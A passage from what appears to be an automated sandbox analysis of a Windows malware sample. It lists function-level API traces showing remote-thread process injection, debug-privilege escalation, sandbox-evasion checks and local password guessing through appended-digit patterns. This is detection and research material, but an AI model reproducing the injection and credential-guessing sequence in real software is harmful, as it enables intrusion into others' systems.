                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant$Clear$Init$Alloc$HeapInitializeString$CreateDecrementInstanceInterlockedProcessSecurity
                                                                                                                                                                                                                • String ID: cmd.exe$p=5w
                                                                                                                                                                                                                • API String ID: 2839743307-760121691
                                                                                                                                                                                                                • Opcode ID: e8233dde59193e1d0be8b60998d85175095778d30159eae7e9dd8f1d15148535
                                                                                                                                                                                                                • Instruction ID: bf3241a60ff26ee6c0642b95ea0adfafd6aded52afbf6c2e6df27db904542273
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8233dde59193e1d0be8b60998d85175095778d30159eae7e9dd8f1d15148535
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8CF1EC75E102199FCB00DFA8C884A9EBBB9FF88710F15815AE914BB351D774AD41CF94
                                                                                                                                                                                                                Function 00401EA0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 169threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,7702DB30), ref: 00401EC6
                                                                                                                                                                                                                • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,?,?,?,00000000,7702DB30), ref: 00401EE2
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 00401F28
                                                                                                                                                                                                                • NetUserGetInfo.NETAPI32(00000000,00000000,00000001,?), ref: 00401F39
                                                                                                                                                                                                                • NetApiBufferFree.NETAPI32(?), ref: 00401F5A
                                                                                                                                                                                                                • NetApiBufferFree.NETAPI32(?), ref: 00401F65
                                                                                                                                                                                                                  • Part of subcall function 004018E0: memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                                  • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,75435430,00000000,?), ref: 00401923
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                                  • Part of subcall function 004018E0: memset.MSVCRT ref: 00401963
                                                                                                                                                                                                                  • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                                  • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                                  • Part of subcall function 004018E0: memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                                  • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                                  • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                                  • Part of subcall function 004018E0: memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                                  • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                                  • Part of subcall function 004018E0: CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 00401FCA
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 0040200A
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 00402046
                                                                                                                                                                                                                • SwitchToThread.KERNEL32(?,?,00404D80,?,?,?), ref: 0040208F
                                                                                                                                                                                                                • NetApiBufferFree.NETAPI32(?), ref: 004020B5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$ByteCharFreeMultiWide$_snprintfmemset$AllocBufferValidate$CreateDisplayFileInfoInformationLogonModuleNameQuerySwitchThreadUserWith
                                                                                                                                                                                                                • String ID: %s1$%s12$%s123
                                                                                                                                                                                                                • API String ID: 1588441251-2882894844
                                                                                                                                                                                                                • Opcode ID: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                                • Instruction ID: f170fe93e02ccaf968bc2c6ae71e56240b4678089189b5983d08b015d4f9d182
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 735184B25143016BD331EB54C984FEB73E8ABD8754F404A2EF6846B1D0DB78DA44CBA6
                                                                                                                                                                                                                Function 004028D0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 34COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20112,?,?,00402E9C), ref: 004028D9
                                                                                                                                                                                                                • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028EA
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 004028F6
                                                                                                                                                                                                                • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 00402906
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 0040290C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AdminAtomGlobalUser$AdjustFindPrivilege
                                                                                                                                                                                                                • String ID: PnEw$Wed Jul 6 06:49:26 20112$explorer.exe$winlogon.exe
                                                                                                                                                                                                                • API String ID: 3001685711-2986670995
                                                                                                                                                                                                                • Opcode ID: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                                • Instruction ID: 2c3c2cb6c74497f887580688acf30243e480456bbc90e7420e586ff1c8abd763
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FF012B07542196AEA1067A1AE0AB5B3A5CDB84790F404177BF04F61D0DAB99C0185FD
                                                                                                                                                                                                                Function 00402FF0 Relevance: 13.5, APIs: 9, Instructions: 39memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00402FF7
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000300,004036DE,7735E610,00402FDE), ref: 0040300F
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00403012
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000300), ref: 0040301F
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00403022
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,004036DE,004036DE,7735E610,00402FDE), ref: 0040302B
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 0040302E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,004036DE), ref: 0040303B
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 0040303E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Free$Validate$String
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2629017576-0
                                                                                                                                                                                                                • Opcode ID: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                                • Instruction ID: 103af2a08650daedf0ea572f36775c75d91e7ca6a6ced768a9e875140008d5cd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5F05EB56012117BEA206BB66D8CF572A6CEF88B82F084025B709F2180CA74CE109678
                                                                                                                                                                                                                Function 004015A0 Relevance: 10.6, APIs: 7, Instructions: 72processCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 004015C4
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?,7702DB30), ref: 004015CF
                                                                                                                                                                                                                • Process32First.KERNEL32 ref: 004015F5
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,?), ref: 00401610
                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 0040161C
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401638
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040164A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3955875343-0
                                                                                                                                                                                                                • Opcode ID: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                                • Instruction ID: d18670d365493a771e2935c97cc000c5a2e18494483a7794571357713e5f98ef
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4111C6B25043106BD310EF55DC4899BBBD8EBE9361F04453AFA55A3290E335D9448BEA
                                                                                                                                                                                                                Function 00401420 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                                • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                                • API String ID: 1545651562-3277137149
                                                                                                                                                                                                                • Opcode ID: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                                • Instruction ID: 5661f09ceaf7dd6985fdec3726855c2d4268d42b19af7d6053b1c23afd98fc53
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3001DB716003049BC714ABBAAC829D6B79DDF89745300813AEB19E32E2C635DC488BAD
                                                                                                                                                                                                                Function 00401390 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                                • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                                • API String ID: 1545651562-3277137149
                                                                                                                                                                                                                • Opcode ID: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                                • Instruction ID: 972971b60caab807df67e590393efcb4d1d6a3813561f3a0b79f06a1da21d750
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69E01AB06203049BEB10AFB1AD09A5637DC9FC47413048032BB09F21A1DA38C8248B6D

                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                Execution Coverage:3.4%
                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:85.9%
                                                                                                                                                                                                                Signature Coverage:18.3%
                                                                                                                                                                                                                Total number of Nodes:1109
                                                                                                                                                                                                                Total number of Limit Nodes:25
                                                                                                                                                                                                                execution_graph 82371 402d30 LoadLibraryA GetModuleFileNameA 82443 403a20 RegOpenKeyExA 82371->82443 82374 402d64 ExitProcess 82375 402d6c 82457 4021d0 CreateFileA 82375->82457 82380 402da1 82468 402360 CreateFileA 82380->82468 82381 402d89 GetTickCount PostMessageA 82381->82380 82390 402dc1 82533 401ea0 40 API calls 82390->82533 82391 402de3 IsUserAnAdmin GetModuleHandleA 82392 402e1c 82391->82392 82393 402dfd GetProcAddress 82391->82393 82396 402e22 82392->82396 82397 402e6e 82392->82397 82393->82392 82395 402e0f GetCurrentProcess 82393->82395 82395->82392 82401 402e26 StrStrIA 82396->82401 82402 402e3c 82396->82402 82399 402e76 StrStrIA 82397->82399 82400 402efd 82397->82400 82398 402dc6 82403 402dd2 82398->82403 82404 402dca ExitProcess 82398->82404 82406 402ea1 82399->82406 82407 402e8c 82399->82407 82410 402930 9 API calls 82400->82410 82401->82402 82409 402e5f 82401->82409 82494 402930 RegCreateKeyExA 82402->82494 82534 403560 70 API calls 82403->82534 82538 402a70 106 API calls 82406->82538 82413 402930 9 API calls 82407->82413 82535 402a70 106 API calls 82409->82535 82414 402f08 GlobalFindAtomA 82410->82414 82411 402dd7 82411->82391 82418 402ddb ExitProcess 82411->82418 82419 402e97 82413->82419 82422 402f58 ExitProcess 82414->82422 82423 402f18 GlobalAddAtomA IsUserAnAdmin 82414->82423 82417 402e64 82536 4012b0 9 API calls 82417->82536 82537 4028d0 43 API calls 82419->82537 82420 402ea6 GlobalFindAtomA 82428 402ef6 82420->82428 82429 402eb6 GlobalAddAtomA IsUserAnAdmin 82420->82429 82426 402f39 IsUserAnAdmin 82423->82426 82427 402f29 82423->82427 82432 402f44 82426->82432 82427->82426 82540 4012b0 9 API calls 82428->82540 82434 402ed7 IsUserAnAdmin 82429->82434 82435 402ec7 82429->82435 82431 402e69 82431->82422 82541 4015a0 7 API calls 82432->82541 82436 402ee2 82434->82436 82435->82434 82539 4015a0 7 API calls 82436->82539 82438 402f4f 82438->82422 82441 401670 32 API calls 82438->82441 82440 402eed 82440->82428 82442 401670 32 API calls 82440->82442 82441->82422 82442->82428 82444 403a6a RegQueryValueExA 82443->82444 82445 403acd GetUserNameA CharUpperA strstr 82443->82445 82448 403a9b RegCloseKey 82444->82448 82449 403a8f RegCloseKey 82444->82449 82446 402d60 82445->82446 82447 403b0b strstr 82445->82447 82446->82374 82446->82375 82447->82446 82451 403b24 strstr 82447->82451 82448->82445 82450 403aae 82448->82450 82449->82445 82450->82445 82450->82446 82451->82446 82452 403b3d GetSystemWindowsDirectoryA GetVolumeInformationA 82451->82452 82452->82446 82453 403b7d 82452->82453 82453->82446 82454 403b99 GetModuleFileNameA StrStrIA 82453->82454 82454->82446 82455 403bc5 StrStrIA 82454->82455 82455->82446 82456 403bd7 StrStrIA 82455->82456 82456->82446 82458 402350 82457->82458 82459 402320 DeviceIoControl CloseHandle 82457->82459 82460 4020e0 memset SHGetFolderPathA 82458->82460 82459->82458 82461 4021a7 82460->82461 82462 40213e PathAppendA SetCurrentDirectoryA 82460->82462 82464 4021b2 FindWindowA 82461->82464 82465 4021ab FreeLibrary 82461->82465 82462->82461 82463 402161 LoadLibraryA 82462->82463 82463->82461 82466 402175 GetProcAddress 82463->82466 82464->82380 82464->82381 82465->82464 82466->82461 82467 402185 82466->82467 82467->82461 82469 402403 WriteFile GetSystemTimeAsFileTime WriteFile CloseHandle 82468->82469 82470 402444 82468->82470 82469->82470 82471 402450 SHGetFolderPathA 82470->82471 82472 402535 82471->82472 82473 402477 82471->82473 82475 402540 SHGetFolderPathA 82472->82475 82473->82473 82474 4024ec MoveFileA 82473->82474 82474->82472 82476 40266f 82475->82476 82477 40256b CreateFileA 82475->82477 82480 402680 CoInitializeEx 82476->82480 82477->82476 82479 4025d1 11 API calls 82477->82479 82479->82476 82481 4026bf GetModuleFileNameW SysAllocString 82480->82481 82482 4026ae 82480->82482 82483 4026ed SysAllocString 82481->82483 82488 402866 82481->82488 82482->82481 82484 4028c4 IsUserAnAdmin 82482->82484 82485 402853 SysFreeString 82483->82485 82486 4026fe CoCreateInstance 82483->82486 82484->82390 82484->82391 82487 402863 SysFreeString 82485->82487 82485->82488 82490 402725 82486->82490 82492 402827 82486->82492 82487->82488 82488->82484 82489 4028be CoUninitialize 82488->82489 82489->82484 82490->82485 82491 4027b3 CoCreateInstance 82490->82491 82490->82492 82493 4027d5 82491->82493 82492->82485 82493->82492 82495 402975 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA _snprintf 82494->82495 82496 4029fd RegCreateKeyExA 82494->82496 82500 4029e0 82495->82500 82497 402a44 82496->82497 82496->82500 82498 402a4c RegFlushKey RegCloseKey 82497->82498 82499 402a5d GetCurrentProcessId 82497->82499 82498->82499 82502 401670 82499->82502 82500->82500 82501 402a3e RegSetValueExA 82500->82501 82501->82497 82503 4018d3 Sleep 82502->82503 82505 401686 82502->82505 82503->82422 82506 4016a5 82505->82506 82507 40169b Sleep 82505->82507 82542 401cf0 memset CreateToolhelp32Snapshot 82505->82542 82508 401cf0 11 API calls 82506->82508 82507->82505 82507->82506 82509 4016ac 82508->82509 82509->82503 82510 4016b4 OpenProcess 82509->82510 82510->82503 82511 4016cf GetModuleHandleA 82510->82511 82512 401706 82511->82512 82513 4016eb GetProcAddress 82511->82513 82515 40170c GetModuleHandleA 82512->82515 82516 40173f VirtualAllocEx 82512->82516 82513->82512 82514 4016f9 GetCurrentProcess 82513->82514 82514->82512 82517 401722 GetProcAddress 82515->82517 82518 40172e 82515->82518 82519 4018b0 GetHandleInformation 82516->82519 82520 401782 WriteProcessMemory 82516->82520 82517->82518 82518->82516 82518->82519 82519->82503 82521 4018c6 82519->82521 82522 40181f WriteProcessMemory FlushInstructionCache CreateRemoteThread 82520->82522 82527 4017ae 82520->82527 82521->82503 82523 4018cc CloseHandle 82521->82523 82525 401862 GetHandleInformation 82522->82525 82526 40188e RtlCreateUserThread 82522->82526 82523->82503 82524 4017b1 VirtualAlloc 82524->82527 82528 4017c9 memcpy WriteProcessMemory VirtualFree 82524->82528 82529 401885 82525->82529 82530 401878 82525->82530 82526->82519 82527->82524 82531 401819 82527->82531 82528->82527 82529->82519 82530->82529 82532 40187e CloseHandle 82530->82532 82531->82522 82532->82529 82533->82398 82534->82411 82535->82417 82536->82431 82537->82431 82538->82420 82539->82440 82540->82431 82541->82438 82543 401d30 GetLastError 82542->82543 82544 401d88 Module32First 82542->82544 82547 401deb 82543->82547 82548 401d3f SwitchToThread CreateToolhelp32Snapshot 82543->82548 82545 401da4 82544->82545 82546 401d55 82544->82546 82549 401db0 StrStrIA 82545->82549 82550 401d63 GetHandleInformation 82546->82550 82551 401d7f 82546->82551 82547->82505 82548->82546 82548->82547 82552 401dc2 StrStrIA 82549->82552 82553 401dce Module32Next 82549->82553 82550->82551 82554 401d72 82550->82554 82551->82505 82552->82546 82552->82553 82553->82546 82553->82549 82554->82551 82555 401d78 CloseHandle 82554->82555 82555->82551 82556 2a01360 82598 2a011d0 82556->82598 82558 2a0136f GetPEB 82559 2a01090 GetPEB 82558->82559 82560 2a01394 82559->82560 82561 2a01000 GetPEB 82560->82561 82562 2a013a0 82561->82562 82563 2a01090 GetPEB 82562->82563 82564 2a013a6 82563->82564 82565 2a01619 82564->82565 82566 2a013bc GetPEB 82564->82566 82567 2a01000 GetPEB 82565->82567 82568 2a01090 GetPEB 82566->82568 82569 2a01625 82567->82569 82572 2a013d8 82568->82572 82570 2a01090 GetPEB 82569->82570 82571 2a0162b 82570->82571 82572->82565 82573 2a01000 GetPEB 82572->82573 82574 2a0141b 82573->82574 82575 2a01090 GetPEB 82574->82575 82576 2a01421 82575->82576 82577 2a01000 GetPEB 82576->82577 82578 2a01441 82577->82578 82579 2a01090 GetPEB 82578->82579 82580 2a01447 VirtualAlloc 82579->82580 82580->82565 82596 2a01460 82580->82596 82581 2a0158c 82582 2a01000 GetPEB 82581->82582 82584 2a015bd 82582->82584 82583 2a01090 GetPEB 82583->82596 82585 2a01090 GetPEB 82584->82585 82586 2a015c3 82585->82586 82587 2a012c0 GetPEB 82586->82587 82588 2a015de 82587->82588 82588->82565 82591 2a01000 GetPEB 82588->82591 82589 2a01090 GetPEB 82590 2a0150f LoadLibraryExA 82589->82590 82590->82596 82593 2a01608 82591->82593 82592 2a01000 GetPEB 82592->82596 82594 2a01090 GetPEB 82593->82594 82595 2a0160e 82594->82595 82597 2bc77c0 2120 API calls 82595->82597 82596->82581 82596->82583 82596->82589 82596->82592 82597->82565 82600 2a011d5 82598->82600 82601 2bd7819 82602 2bd7771 82601->82602 82603 2bd78ab 82602->82603 82604 2bd77ac memcpy 82602->82604 82606 2bd8eb0 82602->82606 82604->82602 82609 2bd8ed0 82606->82609 82608 2bd8ec5 82608->82602 82610 2bd8f1c 82609->82610 82611 2bd8edf 82609->82611 82612 2bd8f23 ReadFile 82610->82612 82613 2bd8f36 82610->82613 82611->82613 82614 2bd8ef1 memcpy 82611->82614 82612->82613 82613->82608 82615 2bd8f11 82614->82615 82615->82608 82616 2bb79e0 NtQuerySystemInformation 82617 2bb7a0f GetCurrentProcessId 82616->82617 82622 2bb7ae9 82616->82622 82625 2bd4880 OpenProcess 82617->82625 82620 2bb7a1e GetCurrentThreadId GetThreadDesktop GetUserObjectInformationA 82621 2bb7a48 lstrcmpiA 82620->82621 82624 2bb7a62 82620->82624 82621->82622 82621->82624 82623 2bb7a80 memset _snprintf OpenMutexA 82623->82624 82624->82622 82624->82623 82626 2bb7a1a 82625->82626 82627 2bd48a5 OpenProcessToken 82625->82627 82626->82620 82626->82624 82628 2bd48ba GetTokenInformation 82627->82628 82629 2bd4952 GetHandleInformation 82627->82629 82631 2bd48d4 CharUpperA 82628->82631 82638 2bd4902 82628->82638 82629->82626 82630 2bd4968 82629->82630 82630->82626 82633 2bd496e CloseHandle 82630->82633 82634 2bd48f0 82631->82634 82632 2bd4936 GetHandleInformation 82632->82629 82635 2bd4945 82632->82635 82633->82626 82636 2bd4904 CharUpperA 82634->82636 82634->82638 82635->82629 82637 2bd494b CloseHandle 82635->82637 82636->82638 82637->82629 82638->82629 82638->82632 82639 2bb3a20 82640 2bb4078 82639->82640 82641 2bb3a45 82639->82641 82641->82640 82642 2bb3aa8 VirtualQuery 82641->82642 82643 2bb3aff 82641->82643 82645 2bd5460 VirtualQuery 82641->82645 82642->82641 82643->82640 82700 2bb3830 RegOpenKeyExA 82643->82700 82645->82641 82649 2bb3b46 SymSetOptions GetCurrentProcess SymInitialize 82650 2bb3b68 GetCurrentProcess 82649->82650 82652 2bb3ba3 82649->82652 82711 2bb3910 82650->82711 82652->82652 82720 2bd5460 VirtualQuery 82652->82720 82654 2bb3bc8 82721 2bd5460 VirtualQuery 82654->82721 82656 2bb3bdb GetLastError _snprintf 82722 2bd5460 VirtualQuery 82656->82722 82658 2bb3c55 82659 2bb3c71 82658->82659 82873 2bd5460 VirtualQuery 82658->82873 82661 2bb3cc8 GetCurrentThread ZwQueryInformationThread 82659->82661 82666 2bb3d2d 82659->82666 82663 2bb3ce5 GetCurrentProcess 82661->82663 82661->82666 82662 2bb3c65 82874 2bd5460 VirtualQuery 82662->82874 82667 2bb3910 6 API calls 82663->82667 82668 2bb3d93 GetCurrentProcess 82666->82668 82669 2bb3dae 82666->82669 82667->82666 82671 2bb3910 6 API calls 82668->82671 82670 2bb4067 VirtualFree 82669->82670 82672 2bb3de2 PathAddBackslashA 82669->82672 82670->82640 82671->82666 82673 2bb3df6 82672->82673 82673->82673 82674 2bb3e10 PathAddBackslashA 82673->82674 82723 2bb3080 82674->82723 82680 2bb3e60 82680->82680 82681 2bb3e78 GetDateFormatA GetTimeFormatA _snprintf 82680->82681 82682 